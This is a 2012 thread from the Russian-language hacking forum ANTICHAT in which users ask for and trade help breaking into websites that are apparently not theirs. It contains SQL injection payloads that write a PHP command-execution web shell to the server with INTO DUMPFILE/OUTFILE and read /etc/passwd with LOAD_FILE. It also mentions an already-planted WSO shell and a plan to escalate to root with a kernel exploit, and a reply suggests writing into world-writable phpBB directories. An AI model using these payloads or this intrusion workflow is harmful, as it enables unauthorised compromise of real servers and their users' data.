ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.08.2012, 21:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Залил shell wso на форум.Теперь хочу получить root права.По не могу разобраться как залить exploit.Подскажите пожалуйста.
Uname: Linux emn55 2.6.26-2-amd64
Експлоит для него
http://www.exploit-db.com/search/?action=search&filter_description=Linux+2.6
Искал долго в поисковике но подробно ничего нету.Спасибо.
|
|
|
|
18.08.2012, 21:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
|
|
|
|
18.08.2012, 21:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
MaxFast я немогу разобраться,как залить експлоит и запустить.
|
|
|
|
18.08.2012, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
помогите составить запрос заливки файла(имею file_priv=Y)
есть уязвимый пхп скрипт(sql inj)
id=x
структура запросса:
SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id
При запросе:
id=9999+union+select+1,2,3--
ошибка:
SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed
вывод в 1 столбец
пишу
9999+union+select+'%3C?php%20system($_GET[%22cmd%22]);%20?%3E',null,null+into+DUMPFILE+'/полный/путь/до/моего/файла/х/test.php'/*-- файл не создается
Как правильно составить запрос?
|
|
|
|
19.08.2012, 00:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
Сообщение от blesse
blesse said:
помогите составить запрос заливки файла(имею file_priv=Y)
есть уязвимый пхп скрипт(sql inj)
id=x
структура запросса:
SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id
При запросе:
id=9999+union+select+1,2,3--
ошибка:
SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed
вывод в 1 столбец
пишу
9999+union+select+'%3C?php%20system($_GET[%22cmd%22]);%20?%3E',null,null+into+DUMPFILE+'/полный/путь/до/моего/файла/х/test.php'/*-- файл не создается
Как правильно составить запрос?
может кавычки фильтруются?
у меня так работало вроде:
PHP код:
PHP:
[COLOR="#000000"]select '[COLOR="#0000BB"][/COLOR]' into outfile '/home/cdut/domains/sss/htdocs/phpmyadmin/1.php'[/COLOR]
|
|
|
|
19.08.2012, 01:21
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
раскрутил double blind inj на 1 сайтике, сбрутил имена всех доступных баз данных, среди них есть и mysql. file_priv соответственно тоже есть. Пути никакие вообще не знаю, локального инклюда нету, скан портов на предмет сервака баз данных ничего хорошего не сказал.
Что сделать можно, кроме как брутить путь к конфигурационным файлам апача? А то что-то нет никакого желания брутить строки через двойную слепоту...
|
|
|
19.08.2012, 11:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
UP
ковычки не фильтруются
9999+union+select+null,'text',null+into+outfile+'/х/х/х/х/х/х/1.php'/*
файл не записывается и вылазит ошибка
QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 union select null,'text',null into outfile '/х/х/х/х/х/х/1.php'/* and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!
Запрос:
9999+select+''+into+outfile+'/х/х/х/х/х/х/1.php'--+
Тоже файл не записывается и ошибка:
QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 select '' into outfile '/х/х/х/х/х/х/1.php'-- and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!
|
|
|
|
19.08.2012, 12:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от blesse
blesse said:
UP
ковычки не фильтруются
9999+union+select+null,'text',null+into+outfile+'/х/х/х/х/х/х/1.php'/*
файл не записывается и вылазит ошибка
QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 union select null,'text',null into outfile '/х/х/х/х/х/х/1.php'/* and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!
Запрос:
9999+select+''+into+outfile+'/х/х/х/х/х/х/1.php'--+
Тоже файл не записывается и ошибка:
QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 select '' into outfile '/х/х/х/х/х/х/1.php'-- and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!
magic qoutes may be?
'asd' просто отображает?
|
|
|
|
19.08.2012, 13:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Сообщение от antiaudomain
antiaudomain said:
magic qoutes may be?
'asd' просто отображает?
запрос
9999+union+select+'1',2,3--+
выводит в столбец просто 1
думаю ,что mq=off т.к.
запрос 9999+union+select+LOAD_FILE('/etc/passwd'),2,3--+ выполняется успешно и выводится этот файл.
Я вот подумал может нету прав у юзера на котором мускул запушен на запись в диру которую я ему подсовываю?как это можно провирить проверить?и как действовать в таком случае?
ЧТО Я ИМЕЮ:
1.Доступ ко всем бд серва(там есть Пхпадмин и таблица psa-похоже ,что это типо cpanel ,но адрес их адреса найти не удалось ровно также как и определить хостинг сайта)
2.Соответственно могу читать файлы.
3.На борту есть форум пхпбб, но в его дб не удалось обнаружить таблиц с юзерами(видать кудато в другое место пишутся)пытался прочитать скрипт реги ,но куда пишутся юзеры так и не обнаружил.
|
|
|
|
19.08.2012, 13:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
"blesse" в пхпбб есть директории на которые по умолчанию права 777, что то вроде папки для аватаров и т.д. пробуй залиться туда.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
